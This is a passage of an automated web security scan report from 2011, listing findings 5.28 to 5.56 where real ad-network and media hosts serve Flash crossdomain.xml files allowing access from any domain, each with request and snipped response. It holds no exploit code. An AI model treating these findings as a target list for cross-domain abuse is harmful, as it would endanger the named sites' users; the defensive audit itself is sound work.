Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:51:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.28. http://idpix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idpix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sun, 02 Oct 2011 23:50:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.29. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:48:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.30. http://kantarmedia.guardian.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kantarmedia.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: kantarmedia.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "39dd8a-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
5.31. http://l.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:50 GMT
ETag: "4e4ab204=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Tue, 16 Aug 2011 18:08:04 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...
5.32. http://m.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
5.33. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:12 GMT
Server: Apache/2.2.4 (Unix)
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 202
Keep-Alive: timeout=5, max=19977
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
5.34. http://oas.guardian.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oas.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "23678b-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
5.35. http://openx.px.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://openx.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: openx.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 02 Oct 2011 23:52:30 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
5.36. http://panel.kantarmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://panel.kantarmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: panel.kantarmedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "ff605-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
5.37. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:50:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.38. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 03 Oct 2011 23:48:53 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
5.39. http://premiumtv.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: premiumtv.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:17 GMT
Server: Omniture DC/2.0.0
xserver: www42
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.40. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 02 Oct 2011 23:49:38 GMT
Content-Type: text/xml;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:37 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>
5.41. http://rs.gwallet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...
5.42. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 02 Oct 2011 08:47:55 GMT
Expires: Fri, 30 Sep 2011 06:56:37 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 54283
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.43. http://secure-uk.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-uk.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-uk.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 02 Oct 2011 23:51:44 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 09 Oct 2011 23:51:44 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...
5.44. https://secure.mlb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.mlb.com

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:22 GMT
Cache-control: max-age=60
Edge-control: max-age=60
Content-type: text/xml
Last-modified: Tue, 18 Jan 2011 20:14:01 GMT
Content-length: 428
Etag: "1ac-4d35f489"
Accept-ranges: bytes
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-access-from domain="*.mlb.com" secure="false" />
   <allow-http-request-headers-from domain="*.mlb.com" headers="*" secure="false"/>
   <site
...[SNIP]...
5.45. http://serve.williamhill.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.williamhill.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: serve.williamhill.com

Response

HTTP/1.1 200 OK
ETag: W/"204-1301398816000"
Last-Modified: Tue, 29 Mar 2011 11:40:16 GMT
Content-Type: application/xml
Content-Length: 204
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...
5.46. http://servedby.flashtalking.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Sun, 02 Oct 2011 23:51:44 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 540

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.47. http://speed.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:49:49 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
5.48. http://stat.flashtalking.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stat.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stat.flashtalking.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "0580c1d81e1acfe994df99be827cb0c3:1279561426"
Last-Modified: Mon, 19 Jul 2010 17:43:46 GMT
Accept-Ranges: bytes
Content-Length: 253
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:53:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://a.flashtalking.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
5.49. http://sync.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x1 pid 0x2317 8983
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...
5.50. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:50:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 06 Jul 2011 22:45:14 GMT
ETag: "8db82c0-ca-4a76e5a88d280"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...
5.51. http://vox-static.liverail.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vox-static.liverail.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vox-static.liverail.com

Response

HTTP/1.0 200 OK
x-amz-id-2: 3sebe0ISz1GFs6/hvk4dqs1hU1eLmkoo5AIw0djnmKp3YLF6a3gCmXnpbbO5MTe8
x-amz-request-id: 90FA83FA648BCA9A
x-amz-meta-s3fox-filesize: 274
x-amz-meta-s3fox-modifiedtime: 1267129495540
Last-Modified: Thu, 25 Feb 2010 20:27:58 GMT
ETag: "1f663267210f6e5843980e9159b0b9ae"
Content-Type: text/xml
Content-Length: 274
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:51:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.52. http://www.luminate.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.luminate.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:30:51 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 01:04:02 GMT
Accept-Ranges: bytes
Content-Length: 273
Content-Type: application/xml
Age: 1305
X-Cache: HIT from lb2-sv.int.pixazza.com
X-Cache-Lookup: HIT from lb2-sv.int.pixazza.com:80
Via: 1.0 lb2-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
<site-contro
...[SNIP]...
5.53. http://www.manutd.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.manutd.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 15:28:55 GMT
Accept-Ranges: bytes
ETag: "eea78028fe7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
svr: web4
Content-Length: 660
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close


<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="cloud.manutd.com" />
<allow-access-from domain="origin-cloud.manutd.com" />
<allow-access-from domain="web1.manutd.com" />
<allow-access-from domain="web2.manutd.com" />
<allow-access-from domain="web3.manutd.com" />
<allow-access-from domain="web4.manutd.com" />
<allow-access-from domain="web5.manutd.com" />
<allow-access-from domain="web6.manutd.com" />
<allow-access-from domain="web7.manutd.com" />
<allow-access-from domain="web8.manutd.com" />
<allow-access-from domain="www.cloud.manutd.com" />
...[SNIP]...
5.54. http://www.premierleague.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.premierleague.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:44:14 GMT
Content-Type: text/xml
Expires: Sun, 02 Oct 2011 23:48:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:48:52 GMT
Content-Length: 322
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.55. http://www9.effectivemeasure.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www9.effectivemeasure.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Fri, 11 Mar 2011 04:05:00 GMT
Content-Length: 322
Connection: close
Date: Sun, 02 Oct 2011 23:52:46 GMT
Server: C20

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.56. http://xml.eplayer.performgroup.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xml.eplayer.performgroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: xml.eplayer.performgroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:33 GMT
ETag: W/"344-1310422012000"
Last-Modified: Mon, 11 Jul 2011 22:06:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 344
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-
...[SNIP]...
<allow-access-from domain="*" secure="false" />
